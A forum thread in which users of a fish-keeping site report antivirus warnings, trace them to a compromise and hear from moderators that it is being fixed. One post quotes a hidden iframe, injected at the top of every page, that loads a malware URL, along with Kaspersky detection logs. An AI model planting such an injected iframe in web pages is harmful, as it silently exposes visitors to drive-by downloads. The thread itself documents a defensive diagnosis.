Hey Mods

FishForums.net Pet of the Month
🐶 POTM Poll is Open! 🦎 Click here to Vote! 🐰
Oh wow. I was gonna post a topic about this but I guess everyone else is having the same problem.

FWIW here's what I'm getting:
120pidd.png


I'm using Chrome browser and Avast antivirus. This thing comes up on every single page.
 
Not sure if it is related but i keep getting messages saying internet explorer has stopped working but it recovers the page to the one before. Rather annoying and it is only happening on this site. No virus warnings coming up though from AVG.
 
I have the same issue using firefox 3.6 and kaspersky. I only noticed it today though
 
Update your browser, windows, and antivirus. For firefox it is firefox 4.0! Windows should update automatically, but check in encase that somehow got turned off. On the 15th my computer shows it did 20 important updates and one optional update from Microsoft the most at one time this entire year. For those using Firefox use Adblock plus! If that fails start updating your java and flash.

This sight is not infected, its something on your end. Considering the sudden problems I had on the 14th I'm positive this is due to some major updates on programs. It was norton that went off on the 14th when I tried to access this site. If you test this site using norton here it says it is currently safe. The alerts we are seeing are likely due to some incompatibilities of older programs with updated ones.
This was the report I kept getting on the 14th and its been gone since then.
tffalert.png
 
Maybe the forum host fixed it? My symantec (at work) isnt kicking up a fuss anymore and i havnt updated anything. But i'm getting the Avast error on my home machine the same as Katty has posted.
 
I'm getting a malware detection from what I assume is a banner ad at the top of the page? (I can't see it as I use an ad blocker).

Kaspersky AV6MP4 is giving me the following:

detected: malware URL: http:/ /galeries_dot_xxxclassificados_dot_com/news/last
detected: malware URL: http:/ /randombroken_dot_ipq_dot_co/news/last

Inspecting the source for the page, this is the code the suspicious data (in an iframe at the top of every page):

<iframe src="http://galeries.xxxclassificados.com/news/last" style="visibility: hidden; position: absolute; left: 0px; top: 0px; " width="10" height="10"></iframe>
 
I'm getting a malware detection from what I assume is a banner ad at the top of the page? (I can't see it as I use an ad blocker).

Kaspersky AV6MP4 is giving me the following:

detected: malware URL: http:// galeries(dot)xxxclassificados(dot)com/news/last
detected: malware URL: http:// randombroken(dot)ipq(dot)co/news/last

I am also getting the above messages from kapersky internet security 2011 (version 11.0.1.400 most recent), firefox all updated and crashes after 1st av warning from kapersky and attempt to get to another part of the forum.

URL: http:// randombroken(dot)ipq(dot)co/news/last - blocked by kapersky due to it being "in the list of suspicious urls"

19/04/2011 16:38:29
Firefox
Detected: HEUR:Trojan-Downloader.Script.Generic
Web page: http:// www(dot)fishforums(dot)net/public/min/index.php?charset=iso-8859-1&f=public/js/ipb.js,public/js/ips.quickpm.js,public/js/ips.forums.js,cache/lang_cache/1/ipb.lang.js//
Name: ipb.lang

19/04/2011 16:45:19
Internet Explorer
Denied: HEUR:Trojan-Downloader.Script.Generic
Web page :http:// www(dot)fishforums(dot)net/public/min/index.php?charset=iso-8859-1&f=public/js/ipb.js,public/js/ips.quickpm.js,public/js/ips.facebook.js,public/js/ips.signin.js,cache/lang_cache/1/ipb.lang.js//
Name: ipb.lang

EDIT: replaced dots to ensure no accidental clicking
 
I had this happen on a website I created for a friend a few months back.

Some javascript get's inserted in to your web pages calling this .js file.

It could be the case that someone has hacked the admin password to fishforums.net and have manually put the lines in there or in my case they found a way in to my host which meant it put this on all websites that host hosted.

First test some other websites that are hosted by the same host as fishforums.net if they are clean you will need to check all fishforums.net php files for inserted <script> tags....and obviously change admin passwords.
 
Have only just had this virus thing come up for me after reading about everyone elses. I also had a weird page come up with just a load of black text writing on that looked like coding! Bit worried
 
We are looking into this as a matter of priority, thank you for making us aware of it.
 
Pleased to report (As the OP) that with the new look forum, the AV warning messages have stopped. :lol:
 

Most reactions

trending

Back
Top